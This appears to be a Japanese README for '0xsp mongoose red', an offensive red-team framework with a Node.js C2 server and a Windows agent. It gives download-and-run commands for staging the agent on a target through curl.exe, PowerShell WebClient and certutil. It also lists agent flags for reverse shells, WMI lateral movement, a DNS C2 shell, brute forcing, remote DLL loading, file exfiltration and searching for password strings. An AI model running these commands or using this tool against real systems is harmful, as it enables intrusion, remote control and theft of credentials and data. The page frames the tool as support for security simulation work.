
サイバーセキュリティシミュレーションとレッドチーム運用のためのユニークなフレームワーク。新しい脆弱性、誤構成、特権昇格攻撃に対するWindows監査を実施し、ネットワーク内の高度な敵対者の戦術と技術を再現します。
プロジェクトの継続的な開発を支援する (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
現在のリリース 2.2.0
0xsp mongoose red バージョンは、サイバーセキュリティシミュレーション中のニーズを支援するために提供されています。このバージョンを使用すると、対象のWindowsオペレーティングシステムを監査し、システムの脆弱性、設定ミス、特権昇格攻撃を検出し、ネットワーク内の高度な敵対者の戦術と技術を複製できます。
Node.js によるWebアプリケーションAPIのサポートにより、タイムリーなインストールとカスタマイズがはるかに簡単になります。WindowsセンサーエージェントはアプリケーションAPIと通信して結果を転送し、双方向技術としてコマンドを受信します。
エージェントは、windows update api および exploit database definitions モジュールを使用してWindowsエクスプロイトを識別および検出できます。新しいリリースでは、以下の脆弱性も検出します。
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
デフォルトのアクセス資格情報:
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#例1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#例2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#例3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --Windowsサービスとインストール済みドライバーを取得。
-u --ユーザー、グループ、ロールに関する情報を取得。
-c --接続されたドライバーから拡張子で機密設定ファイルを検索。
-n --ネットワーク情報、ネットワークインターフェース、接続詳細を取得。
-w --書き込み可能なディレクトリの列挙、アクセス権限チェック、変更された権限。
-i --Windowsシステム情報、セッション、常に昇格チェックを列挙。
-l --ファイル内で特定の文字列を検索(例: agent.exe -l c:\ password *.config)。
-o --Node.jsアプリケーションのホストアドレスを指定(srvhostも使用可)。
-p --インストール済みソフトウェア、実行中のプロセス、タスクを列挙。
-e --カーネル検査ツール。ツールデータベースからWindowsカーネル脆弱性を検索。
-x --Node.jsアプリケーションへの接続を認証するパスワード。
-d --ターゲットマシンに直接ファイルをダウンロード。
-t --ターゲットマシンからNode.jsアプリケーションにファイルをアップロード。
-spooler --単一ホストまたはホストリストをスキャンして、CVE-2021-1675の可能性を調査(例: -spooler -srvhost または -spooler -hosts)
-m --すべての既知のスキャンタイプをまとめて実行。
[!] レッドチーム戦術セクション
-r --特定のアカウントでリバースシェルを起動。
-lr --WMIを使用した横移動技術(例: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip)
-nds --ネットワーク検出と共有列挙
-dns --インタラクティブなDNS C2Cシェルを確立
-cmd --HTTPシェル経由でコマンドを転送
-interactive --インタラクティブモードを開始(例: プラグインの読み込みなど)
-username --特定の攻撃モジュール用のID認証
-password --特定の攻撃モジュール用のID認証
-host --攻撃対象のリモートホストを指定
-srvhost --Node.jsアプリケーションのrhostを設定
-bf --ローカルユーザー/ドメインユーザーのブルートフォースモジュール
-import --DLLファイルをローカルにインポートして実行
-remote --リモートホストからDLLファイルをインポートして実行
https://0xsp.com/security%20dev/0xsp-mongoose-red
0xspの新しいチュートリアルやトリックが公開されたときに通知を受け取るには、以下のチャンネルに登録してください。 https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg